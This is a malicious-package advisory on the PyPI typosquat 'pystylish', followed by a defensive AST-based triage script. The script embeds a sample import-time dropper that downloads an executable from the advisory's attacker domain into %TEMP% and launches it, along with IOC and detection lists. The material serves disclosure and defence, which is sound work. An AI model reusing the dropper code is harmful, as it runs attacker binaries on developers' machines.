{"id":"MAL-2026-6076","summary":"Malicious code in pystylish (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (3a6a09e52477106b9586e89c2b0207bdc51e6d22dad500b7cc12a424d684c35b)\nOn `import pystylish`, the package's __init__.py spawns a daemon thread that downloads a Windows executable from https://goy.mikoz.xyz/boh3.exe, writes it to %TEMP%/vcredist_x86.exe (disguised as the Microsoft Visual C++ runtime installer), and executes it via subprocess.Popen. The domain is unrelated to the package's stated purpose (a terminal color/fade library) and is not a publisher-controlled host. To evade local DNS controls, the loader resolves the C2 domain through DNS-over-HTTPS (Cloudflare 1.1.1.1/dns-query and dns.google/resolve), then connects to the resolved IP with a manual Host header so /etc/hosts entries and sinkholes are bypassed. Error paths print a fake `Failed to connect to discord.com:80` message regardless of the actual destination, providing cover for the unrelated outbound traffic. The package is a typosquat/clone of the legitimate `pystyle` library by billythegoat356 — README still points at `github.com/billythegoat356/pystyle` while the package is published under the name `pystylish`, and the library API is copied verbatim from pystyle with the dropper appended. Any developer who installs and imports pystylish (including transitively) will silently fetch and run an attacker-controlled binary on Windows.\n\n## Source: kam193 (f8318d882352a4515c0598fc728a7609874502d0e42f98a8f47214307d07aec8)\nClone of a legitimate package. 
During import, the code downloads and executes a malicious executable.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-pystylish\n\n\nReasons (based on the campaign):\n\n\n - Downloads and executes a remote executable.\n\n\n - malware\n\n\n - clones-real-package\n","modified":"2026-06-17T20:01:51.897033501Z","published":"2026-06-17T19:05:58Z","database_specific":{"iocs":{"domains":["goy.mikoz.xyz","mikoz.xyz"],"urls":["https://goy.mikoz.xyz/boh3.exe"]},"malicious-packages-origins":[{"id":"IN-MAL-2026-006934","sha256":"3a6a09e52477106b9586e89c2b0207bdc51e6d22dad500b7cc12a424d684c35b","versions":["2.9"],"source":"amazon-inspector","modified_time":"2026-06-17T19:45:13Z","import_time":"2026-06-17T19:45:56.979348464Z"},{"id":"pypi/2026-06-pystylish/pystylish","sha256":"f8318d882352a4515c0598fc728a7609874502d0e42f98a8f47214307d07aec8","versions":["2.9"],"source":"kam193","modified_time":"2026-06-17T19:05:58.40841Z","import_time":"2026-06-17T19:45:58.747736209Z"}]},"references":[{"type":"PACKAGE","url":"https://pypi.org/project/pystylish/2.9/"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/26486dbb6ee9811ddb3a288554eb80cbe2883069db0fd9f578736c971bcf8db2/detection"},{"type":"EVIDENCE","url":"https://hybrid-analysis.com/sample/26486dbb6ee9811ddb3a288554eb80cbe2883069db0fd9f578736c971bcf8db2"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/pystylish"}],"affected":[{"package":{"name":"pystylish","ecosystem":"PyPI","purl":"pkg:pypi/pystylish"},"versions":["2.9"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in 
nature.","cweId":"CWE-506"}],"indicators":{"package_integrity":[{"hashes":{"sha256":"0e9d3793b1258bde25398c194b158c0e9315b090c4bb584f4f7a9ee600212a9e","md5":"4a2d608fb193350beb95dd53c05d6908","blake2b_256":"77f71068de21b76dc12dbba2ea987e2bac443cedd16e21f6066a8ef71515e5dd"},"filename":"pystylish-2.9-py3-none-any.whl"},{"hashes":{"sha256":"2d570677c1fb22574b410f00106fe8d4ec5ad2c2342c79228e1e8e451f60c782","md5":"9434a4d2b2c5f98e21c42cc58c5cbaf7","blake2b_256":"ad035c72d787bcb4f2051fc2093206b63b070428cd612510596a246bca97e0e9"},"filename":"pystylish-2.9.tar.gz"}],"evidence_files":[{"sha256":"893e61f125ef8309dee86d5ccf5af89d3d0d9460bd0f575929de7a33cf8b8eb9","path":"pystylish/__init__.py","tlsh":"7ef27225ed171a135ab3c41e8c87d425f32923671a654617fe9cc1a82fb2128d3f4afd"},{"sha256":"245135d5e573e7d6ed240fcd1e5d5fad8b2e1608f581613bc4acfd23c2acf624","path":"README.md","tlsh":"b29002e3090390442f831dc948a861146a722484fe675445713b42115004865434a01e"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/pystylish/MAL-2026-6076.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}
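The advisory above describes the dropper's shape rather than giving a detection for it: a daemon thread started at import, DNS-over-HTTPS resolution to dodge local resolvers, a Windows binary fetched from a non-publisher host and written under %TEMP%, then a subprocess launch. The following is an added example (not code from the advisory, from PyPI, or from the pystylish/pystyle projects) of a static triage script that parses a package's `__init__.py` with Python's `ast` module and records each of those building blocks, then combines them into a verdict. The IOC domains and the two DoH endpoints come from the advisory text; the category names, the list of process-launch calls, and the verdict thresholds are this example's own assumptions. The sample module at the bottom is a constructed, inert imitation of the described behaviour that is only ever parsed, never executed.

```python
# Static triage for the import-time dropper pattern described in MAL-2026-6076.
# Added example; not code from the advisory or from the pystylish/pystyle projects.
# Category names, EXEC_CALLS and the verdict thresholds are this example's own
# assumptions; the IOC domains and DoH endpoints are taken from the advisory.
import ast
import re

KNOWN_IOCS = ("goy.mikoz.xyz", "mikoz.xyz")                  # IOC domains from the advisory
DOH_ENDPOINTS = ("1.1.1.1/dns-query", "dns.google/resolve")  # resolvers the loader uses
EXEC_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call", "os.system", "os.startfile"}
TEMP_ENV_VARS = {"temp", "tmp", "localappdata"}              # user-writable drop locations


def _dotted(func):
    """'mod.attr' for mod.attr(...), the bare name for name(...), else None."""
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return f"{func.value.id}.{func.attr}"
    return func.id if isinstance(func, ast.Name) else None


class _Visitor(ast.NodeVisitor):
    def __init__(self):
        self.findings = {}  # category -> [(line, detail), ...]

    def add(self, category, node, detail):
        self.findings.setdefault(category, []).append((node.lineno, detail))

    def visit_Constant(self, node):
        if isinstance(node.value, str):
            s, low = node.value, node.value.lower()
            if any(ioc in low for ioc in KNOWN_IOCS):
                self.add("known_ioc", node, s)
            if any(ep in low for ep in DOH_ENDPOINTS):
                self.add("doh", node, s)
            # A URL ending in a Windows executable is the "remote binary" half.
            if re.match(r"https?://", low) and low.endswith((".exe", ".dll", ".scr")):
                self.add("remote_fetch", node, s)
            if low in TEMP_ENV_VARS or "%temp%" in low:
                self.add("temp_drop", node, s)
        self.generic_visit(node)

    def visit_Call(self, node):
        name = _dotted(node.func)
        if name in EXEC_CALLS:
            self.add("exec", node, name)
        if name in ("threading.Thread", "Thread"):
            daemon = any(kw.arg == "daemon" and isinstance(kw.value, ast.Constant)
                         and kw.value.value is True for kw in node.keywords)
            self.add("thread", node, "daemon=True" if daemon else "thread")
        self.generic_visit(node)


def scan_source(src):
    """Return {category: [(line, detail)]} for the indicators found in `src`."""
    tree = ast.parse(src)
    visitor = _Visitor()
    # A bare call statement at module level runs on `import`; that is what
    # turns a dropper function into an import-time payload.
    for stmt in tree.body:
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            visitor.add("import_call", stmt, ast.unparse(stmt.value)[:60])
    visitor.visit(tree)
    return visitor.findings


def verdict(findings):
    """Thresholds are this example's own choice, not a rule from the advisory."""
    cats = set(findings)
    if "known_ioc" in cats:
        return "MALICIOUS"
    # Remote binary + process launch + import-time execution is the dropper
    # shape; DoH or %TEMP% use only raises confidence, so it is not required.
    if {"remote_fetch", "exec", "import_call"} <= cats:
        return "SUSPICIOUS"
    return "CLEAN"


# Constructed imitation of the behaviour the advisory describes. It is a
# string handed to ast.parse; this file never executes it.
SAMPLE_DROPPER = '''
import os, subprocess, threading, urllib.request

def _resolve(host):
    return urllib.request.urlopen("https://1.1.1.1/dns-query?name=" + host).read()

def _drop():
    try:
        url = "https://goy.mikoz.xyz/boh3.exe"
        path = os.path.join(os.environ["TEMP"], "vcredist_x86.exe")
        open(path, "wb").write(urllib.request.urlopen(url).read())
        subprocess.Popen([path])
    except Exception:
        print("Failed to connect to discord.com:80")

threading.Thread(target=_drop, daemon=True).start()
'''

if __name__ == "__main__":
    found = scan_source(SAMPLE_DROPPER)
    print(verdict(found), {k: [l for l, _ in v] for k, v in found.items()})
```

To triage an installed package, pass the text of its `__init__.py` to `scan_source`. A daemon thread on its own is deliberately not enough for a non-CLEAN verdict, since legitimate libraries start background threads; the script only escalates when a remote executable, a process launch, and a module-level call occur together, and goes straight to MALICIOUS when one of the advisory's IOC domains appears in a string literal.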